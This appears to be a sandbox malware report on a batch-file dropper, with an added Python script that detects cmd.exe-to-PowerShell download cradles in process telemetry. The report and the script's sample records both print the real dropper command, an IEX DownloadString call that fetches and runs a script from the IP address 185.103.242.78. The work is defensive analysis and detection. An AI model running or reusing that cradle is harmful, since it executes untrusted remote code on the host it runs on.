Analysis
  max time kernel: 121s
  max time network: 121s
  platform: windows10_x64
  resource: win10
  submitted: 16-07-2020 05:10
Static task: static1

Behavioral task: behavioral1
  Sample: 594f735f38e39066e0ea5392e1a93dba.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 594f735f38e39066e0ea5392e1a93dba.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 594f735f38e39066e0ea5392e1a93dba.bat
  Size: 219B
  MD5: 2dcb6e0063636fed2c26c0b88d389592
  SHA1: 001718f5ec05cecbdd87d1950fb13fa8e8b1c93f
  SHA256: 4df4f51379a5fdc56671e999a52ac96c8b4fd0194a2af6f602bc7fc20825ea1a
  SHA512: a3157d8ad3f0a88b822774239cdfb1ea7e15fcd89b8061310656239ff64a0480f1ef9a8d70fee76e759de63cb31eeb29f175518776a93c7951f90228abdb4644
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source: URLs
    ps1.dropper: http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba
Signatures
  Suspicious use of WriteProcessMemory (3 IoCs)
    description          pid   process   target PID   target process
    wrote to memory of   3676  cmd.exe   4044         powershell.exe   (reported 3 times)

  Program crash (1 IoC)
    pid   process       pid_target   target process
    3852  WerFault.exe  4044         powershell.exe

  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    description                 pid   process
    Token: SeRestorePrivilege   3852  WerFault.exe
    Token: SeBackupPrivilege    3852  WerFault.exe
    Token: SeDebugPrivilege     3852  WerFault.exe

  Suspicious behavior: EnumeratesProcesses (14 IoCs)
    pid   process
    3852  WerFault.exe   (reported 14 times)
Processes
  C:\Windows\system32\cmd.exe  (PID 3676)
    command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\594f735f38e39066e0ea5392e1a93dba.bat"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4044)
      command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba');Invoke-SWAGNDKFQZBV;Start-Sleep -s 10000"

      C:\Windows\SysWOW64\WerFault.exe  (PID 3852)
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 704
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
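The tree above is the standard batch-file download cradle: cmd.exe runs the .bat, which launches the 32-bit (SysWOW64) PowerShell to IEX whatever DownloadString fetches from the paste URL, then calls a function (Invoke-SWAGNDKFQZBV) that only exists in the downloaded script and sleeps. WerFault.exe attaching to PID 4044 shows the PowerShell process crashed, so the second stage was not observed in this run; the dropper URL is the IoC the report actually extracts. The script below is an added example, not part of the sandbox report, that applies the same observations as a detection over process-creation telemetry. The event records are constructed to mirror the tree (shaped like Sysmon Event ID 1 fields, with the parent PID of cmd.exe and a benign third record assumed), and the 600-second sleep threshold is an assumption to tune locally.

```python
"""Flag cmd.exe -> powershell.exe download-and-execute cradles in process telemetry."""
import re

# Constructed records shaped like Sysmon Event ID 1 (Process Create).
# The first two mirror the sandbox process tree; the third is a benign
# control that must not be flagged. The ppid of cmd.exe is assumed.
EVENTS = [
    {"pid": 3676, "ppid": 1000,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\594f735f38e39066e0ea5392e1a93dba.bat"'},
    {"pid": 4044, "ppid": 3676,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                 r'"IEX (New-Object System.Net.WebClient).DownloadString('
                 r"'http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba');"
                 r'Invoke-SWAGNDKFQZBV;Start-Sleep -s 10000"')},
    {"pid": 5100, "ppid": 3676,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

# Download primitives commonly paired with IEX; extend for your environment.
CRADLE = re.compile(r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)
INVOKE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"();]+", re.I)
SLEEP = re.compile(r"Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)
BATCH = re.compile(r"\.(?:bat|cmd)\b", re.I)
LONG_SLEEP_SECONDS = 600  # assumption: anything longer looks like keep-alive


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event, by_pid):
    """Return the reasons a powershell.exe launch looks like a download cradle."""
    reasons = []
    if basename(event["image"]) != "powershell.exe":
        return reasons
    cmd = event["cmdline"]
    parent = by_pid.get(event["ppid"])
    # Join to the parent record: cmd.exe running a .bat/.cmd file.
    if parent and basename(parent["image"]) == "cmd.exe" and BATCH.search(parent["cmdline"]):
        reasons.append("launched from batch file")
    # SysWOW64 means the 32-bit host on a 64-bit Windows; unusual for admins.
    if "\\syswow64\\" in event["image"].lower():
        reasons.append("32-bit powershell on 64-bit host")
    # Both a network fetch and an eval of the result in one command line.
    if CRADLE.search(cmd) and INVOKE.search(cmd):
        reasons.append("download-and-execute cradle")
    m = SLEEP.search(cmd)
    if m and int(m.group(1)) >= LONG_SLEEP_SECONDS:
        reasons.append("long Start-Sleep keeps the process alive")
    return reasons


def analyze(events):
    """Findings (pid, ppid, reasons, urls) for events containing a cradle."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        reasons = classify(e, by_pid)
        if "download-and-execute cradle" in reasons:
            findings.append({"pid": e["pid"], "ppid": e["ppid"],
                             "reasons": reasons, "urls": URL.findall(e["cmdline"])})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"PID {f['pid']} (parent {f['ppid']}): {', '.join(f['reasons'])}")
        for u in f["urls"]:
            print("  url:", u)
```

Only the record with both a download primitive and IEX is reported; batch-file parentage, the SysWOW64 image and the long sleep are attached as context so an analyst sees why the hit scored high, and the extracted URL can be pushed straight to blocklists. The benign `-File backup.ps1` launch from the same cmd.exe is deliberately left unflagged.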